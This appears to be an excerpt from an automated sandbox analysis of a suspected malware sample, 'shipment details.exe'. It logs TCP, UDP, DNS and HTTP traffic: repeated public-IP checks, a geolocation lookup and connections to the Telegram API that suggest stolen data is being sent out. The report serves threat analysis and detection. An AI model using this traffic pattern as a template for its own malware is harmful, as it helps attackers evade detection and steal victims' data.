Oct 8, 2024 18:21:16.189443111 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:16.189522982 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.190299988 CEST	80	49722	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:16.190377951 CEST	49722	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.190490007 CEST	49722	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.195457935 CEST	80	49722	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:17.751296043 CEST	80	49722	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:17.752912045 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:17.752944946 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:17.753004074 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:17.753349066 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:17.753360987 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:17.791578054 CEST	49722	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:18.238470078 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:18.240148067 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:18.240164995 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:18.392690897 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:18.392967939 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:18.393079042 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:18.393374920 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:18.397001028 CEST	49722	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:18.398760080 CEST	49724	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:18.402621984 CEST	80	49722	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:18.402692080 CEST	49722	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:18.403733015 CEST	80	49724	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:18.403812885 CEST	49724	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:18.403886080 CEST	49724	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:18.409152031 CEST	80	49724	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:19.013358116 CEST	80	49724	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:19.020797968 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:19.020905972 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:19.020993948 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:19.021265984 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:19.021291018 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:19.057207108 CEST	49724	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:19.495693922 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:19.497335911 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:19.497423887 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:19.865035057 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:19.865304947 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:19.865386963 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:19.866715908 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:19.933226109 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:19.933326006 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:19.933413982 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:19.939507008 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:19.939552069 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:19.952033043 CEST	49724	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:19.957870007 CEST	80	49724	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:19.957937956 CEST	49724	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:20.579505920 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:20.579631090 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:20.581192970 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:20.581223011 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:20.581557989 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:20.582784891 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:20.627402067 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:20.823173046 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:20.823359966 CEST	443	49727	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:20.823436022 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:20.828133106 CEST	49727	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:26.030330896 CEST	49710	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:26.209170103 CEST	62359	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:26.209206104 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:26.209295988 CEST	62359	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:26.209523916 CEST	62359	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:26.209542990 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:26.862757921 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:26.872427940 CEST	62359	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:26.872464895 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:26.872859955 CEST	62359	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:26.872867107 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:27.276585102 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:27.279094934 CEST	443	62359	149.154.167.220	192.168.2.5
Oct 8, 2024 18:21:27.279162884 CEST	62359	443	192.168.2.5	149.154.167.220
Oct 8, 2024 18:21:27.279438019 CEST	62359	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 18:21:04.687151909 CEST	53973	53	192.168.2.5	1.1.1.1
Oct 8, 2024 18:21:04.696827888 CEST	53	53973	1.1.1.1	192.168.2.5
Oct 8, 2024 18:21:05.511177063 CEST	61086	53	192.168.2.5	1.1.1.1
Oct 8, 2024 18:21:05.522891998 CEST	53	61086	1.1.1.1	192.168.2.5
Oct 8, 2024 18:21:19.920439005 CEST	56286	53	192.168.2.5	1.1.1.1
Oct 8, 2024 18:21:19.929059982 CEST	53	56286	1.1.1.1	192.168.2.5
Oct 8, 2024 18:21:24.111473083 CEST	53	50459	1.1.1.1	192.168.2.5
Oct 8, 2024 18:21:25.581006050 CEST	53	52994	1.1.1.1	192.168.2.5
Oct 8, 2024 18:21:27.697385073 CEST	61907	53	192.168.2.5	1.1.1.1
Oct 8, 2024 18:21:27.705954075 CEST	53	61907	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 18:21:04.687151909 CEST	192.168.2.5	1.1.1.1	0x1a3e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:05.511177063 CEST	192.168.2.5	1.1.1.1	0x7b49	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:19.920439005 CEST	192.168.2.5	1.1.1.1	0x189a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:27.697385073 CEST	192.168.2.5	1.1.1.1	0x9661	Standard query (0)	56.163.245.4.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 18:21:04.696827888 CEST	1.1.1.1	192.168.2.5	0x1a3e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 18:21:04.696827888 CEST	1.1.1.1	192.168.2.5	0x1a3e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:04.696827888 CEST	1.1.1.1	192.168.2.5	0x1a3e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:04.696827888 CEST	1.1.1.1	192.168.2.5	0x1a3e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:04.696827888 CEST	1.1.1.1	192.168.2.5	0x1a3e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:04.696827888 CEST	1.1.1.1	192.168.2.5	0x1a3e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:05.522891998 CEST	1.1.1.1	192.168.2.5	0x7b49	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:05.522891998 CEST	1.1.1.1	192.168.2.5	0x7b49	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:19.929059982 CEST	1.1.1.1	192.168.2.5	0x189a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 8, 2024 18:21:27.705954075 CEST	1.1.1.1	192.168.2.5	0x9661	Name error (3)	56.163.245.4.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:04.711076975 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:05.303951025 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63df5b6fe753c878e3b2aad364032d18 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 18:21:05.308419943 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 18:21:05.475451946 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10b5ac212d20b0e6631f7ba9f63daca5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 18:21:06.308073997 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 18:21:07.465899944 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ff2e1fba6adea1b5328feec3fc4b457a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:08.103815079 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 18:21:08.685745001 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 963db384dd09f8e74b024be4b07fc351 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:09.614213943 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:10.195403099 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3dcdf443f0ade99cc1abe5f4562aa23 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:10.851270914 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:11.464623928 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d1168478ea676cb3d87958921e7999b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:12.118496895 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:13.705847979 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 675d8e65517b97c86e9d6f3767a8c238 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:14.323060036 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:14.911712885 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a427fe093b97665d596df877499d1e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 18:21:16.031490088 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a427fe093b97665d596df877499d1e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 18:21:16.032113075 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a427fe093b97665d596df877499d1e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 18:21:16.034037113 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a427fe093b97665d596df877499d1e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:16.190490007 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:17.751296043 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 24fa597a7e93f8bdc7ad8f9815989ff8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49724	158.101.44.242	80	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 18:21:18.403886080 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 18:21:19.013358116 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d2931671faadc792fbccca8f8f0ba783 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:06 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 16:21:06 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70798 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pspgq9GLrceOySZs3Dd%2FT9U%2FMYNUxTKif13XxY38DN97PrXxBbY81%2Bm97y9hHdCB3bJbWV%2F1i2qwaXUaswcQrrjdp%2Ft2AFr2qnucYDRkCnY11IfbPFIbTIb69vtRdLhvJV8ypDpW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf77649ff0b1879-EWR
2024-10-08 16:21:06 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:07 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
